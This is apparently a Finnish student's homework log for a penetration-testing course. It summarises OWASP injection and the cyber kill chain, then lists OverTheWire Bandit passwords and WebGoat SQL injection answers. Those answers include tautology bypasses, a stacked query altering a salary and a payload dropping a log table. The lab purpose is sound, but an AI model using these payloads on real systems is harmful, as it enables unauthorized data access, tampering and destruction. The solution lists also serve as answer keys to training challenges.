Tero Karvisen "Tunkeutumistestaus" Kurssi (Syksy 2021)

H1: Kotiläksyt

z: lue ja tiivistä

OWASP 10 A03:2021 - Injection

• Injektio on mahdollinen kun käyttäjän syöttämä data ei ole validoitu, suodatettu tai puhdistettu.
• Datan voi syöttää esimerkiksi haku-kentään
• Tyyppillisimmät injektiot ovat SQL, NoSQL, OS komento, ORM, LDAP, EL tai OGNL inejktioita.
• Esimerkkiskenario: String query = "SELECT \* FROM accounts WHERE custID='" + request.getParameter("id") + "'"; Hyökkäjä muokkaa selaimessa id parametrin arvoksi "or '1' = '1'": http://example.com/app/accountView?id=' or '1'='1. Näin voi päästä käsiksi koko tietokannan sisältöön jos järjestelmä ei ole suojattu SQL injektion hyökkäystä vastaan.

Killchain

Lähteenä käytetty: Hutchins et al 2011: Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains

• Kill chain on puolustusvoimien maailmasta lähtöisin oleva konsepti, joka kuvaa hyökkäyksen struktuuria ja eri vaiheita
• Tietokonemaailmassa, kun puhutaan cyber kill chainissa, tarkoitetaan konseptia joka kuvaa kyberhyökkäyksen eri vaiheita: Reconnaissance (Valmstauttuminen), Weaponization (Aseistuminen), Delivery (Toimitus), Exploitation (Haavoittovuuksien hyväksikäyttö), Installation (Asentaminen), C2/Command and Control (Komento ja ohjaus), Actions and Objectives (Hyödyn saaminen, tulosten saavuttaminen)
• Hyökkäyksen kill chainin tunteminen auttaa ennaltaehkäisemään hyökkäyksiin ja määrittelee keinot niiden torjumiseksi.

Darknet diaries

Kuuntelin tämän podcastin kaikki jaksot aikoinaan ja seuraan sitä myös aktiivisesti koko ajan. Hakkeroinnista minulle on jäänyt mieleen seuraavat pointit:

• Blackhat hakkerit jäävät useammiten kiinni (poislukien NSA:t)
• Whitehat toiminnalla tienaa paremmin nykyaikaina ja bonuksena vielä se, ettei siitä saa rikosoikudellisia seuraamuksia, jotka ovat esimerkiksi USA:ssa aika rajuja
• Huono tietoturva yhdistettynä heikkoihin salasanoihin on yleisin syy hakkeroinnin onnistumiselle
• Haktivismi on ehkä filosifisesti ajattellen kaunista, mutta ei hirveän järkevää

Kali Linux asennus

Asensin Kali Linuxin VirtualBoxiin

a: over the wire tasot 0-4

			Level 0: 
			evgeni$ ssh -p 2220 bandit0@bandit.labs.overthewire.org

			Level 1: 
			bandit0@bandit:~$ cat readme 
			boJ9jbbUNNfktd78OOpsqOltutMc3MY1

			Level 2: 
			bandit1@bandit:~$ cat ./-
			CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

			Level 3: 
			bandit2@bandit:~$ cat spaces\ in\ this\ filename 
			UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

			Level 4: 
			bandit3@bandit:~$ cd inhere/
			bandit3@bandit:~/inhere$ ls -la
			total 12
			drwxr-xr-x 2 root    root    4096 May  7  2020 .
			drwxr-xr-x 3 root    root    4096 May  7  2020 ..
			-rw-r----- 1 bandit4 bandit3   33 May  7  2020 .hidden
			bandit3@bandit:~/inhere$ cat .hidden 
			pIwrPrtPN36QITSp3EQaw936yaFoFgAB
		

c: asenna WebGoat

Asensin WebGoatin ja käynistin sen Dockerin kautta. Loin paikallisen webgoat -käyttäjän.

d: WebGoat tehtävät

http basics

POST ja minun tapauksessa magic number oli "32".

developer tools

WebGoatin esimerkissä oli käytetty Google Chromen devtoolseja, mutta Mozillan vastaava ajaa asiansa yhtä hyvin. Ensimmäisessä osiossa console:n kautta piti kutsua JavaScript funktio webgoat.customjs.phoneHome(), jonka jälkeen Network -välilehdestä huomasin POST -requestin ja JSON vastauksen jossa oli "output: phoneHome Response is 338125". Kokeilin syöttää numeron kenttään ja tehtävä on suoritettu onnistuneesti.

Seuraava kohdassa piti saada talteen networkNum, joka oli minun tapauksessa "59.20672052798035". Tehtävä suoritettu onnistuneesti.

A1 injection (intro)

			2: select department from employees where first_name = 'Bob' and last_name = 'Franco';
			3: update employees set department='Sales' where first_name='Tobi' and last_name='Barnett';
			4: alter table employees add phone varchar(20);
			5: grant all on grant_rights to unauthorized_user;
			9: Smith' or '1'='1
			10: SELECT * From user_data WHERE Login_Count = 3 and userid= 0 or 1=1
			11: Foo' or '1'='1 | Bar' or '1' = '1
			12: Employee: Smith, TAN: 3SL99A'; update employees salary=100000 where first_name='John' and last_name='Smith';--
			13: sel%';drop table access_log;--